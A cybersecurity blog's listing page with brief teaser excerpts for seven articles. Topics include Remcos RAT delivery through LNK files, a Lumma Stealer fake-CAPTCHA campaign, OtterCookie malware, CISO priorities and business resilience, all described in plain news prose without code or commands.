October 10, 2025

Cybersecurity

Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks

Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks

ellonjohns09 mins

Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT. “Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents,” Qualys security researcher Akshay Thorve said in a technical report. “The attack chain…

Read More
4 critical leadership priorities for CISOs in the AI era

4 critical leadership priorities for CISOs in the AI era

ellonjohns012 mins

Everyone knows CISOs aren’t really working that hard in those cushy offices. Heck, they’re only thwarting compliance nightmares, blocking costly cyberattacks, protecting employees from predatory phishing emails, and now dodging the feds. You know, just the little things needed to safeguard an organization’s information assets. Kidding, of course. In fact, as artificial intelligence (AI) and generative AI (genAI) permeate and transform businesses, chief information security…

Read More
What is business resilience? | Definition from TechTarget

What is business resilience? | Definition from TechTarget

ellonjohns014 mins

Business resilience is an organization’s ability to adapt quickly to disruptions while maintaining continuous business operations and safeguarding people, assets and overall brand equity. Transcending disaster recovery (DR) and business continuity (BC), business resilience offers post-disaster strategies to avoid costly downtime, shore up vulnerabilities and maintain business operations in the face of additional, unexpected outages…

Read More
How Compliance Training Software Protects Your Business from Risk

How Compliance Training Software Protects Your Business from Risk

ellonjohns011 mins

The modern business environment exposes organizations to a range of challenges that affect business operations, hence the need for robust regulations. Ignoring standards and guidelines can lead to costly fines, operational disruptions, and reputational damage. Last year, a US court asked a bank to pay USD$3 billion in fines—the biggest in history—for having weak monitoring…

Read More
Breaking down silos in cybersecurity – Help Net Security

Breaking down silos in cybersecurity – Help Net Security

ellonjohns010 mins

All organizations erect silos – silos between groups and departments, across functions and among technologies. Silos represent differences in practices, culture and operations. Their presence inhibits communication and collaboration. As companies scale from startup to mid-sized and beyond, silos multiply and ossify. As operations expand from one site to many, from on-premises to cloud, from…

Read More
Lumma Stealer, coming and going

Lumma Stealer, coming and going

ellonjohns024 mins

In September 2024, a threat hunt across Sophos Managed Detection and Response’s telemetry uncovered a Lumma Stealer campaign using fake CAPTCHA sites that instructed victims to paste a (malicious) PowerShell-encoded command into Windows’ command-line interface. Subsequent investigations allowed us to dig deeply into the mechanics of the notorious information stealer. This post recounts those discoveries,…

Read More
OtterCookie v4 Adds VM Detection and Chrome, MetaMask Credential Theft Capabilities

OtterCookie v4 Adds VM Detection and Chrome, MetaMask Credential Theft Capabilities

ellonjohns013 mins

The North Korean threat actors behind the Contagious Interview campaign have been observed using updated versions of a cross-platform malware called OtterCookie with capabilities to steal credentials from web browsers and other files. NTT Security Holdings, which detailed the new findings, said the attackers have “actively and continuously” updated the malware, introducing versions v3 and…

Read More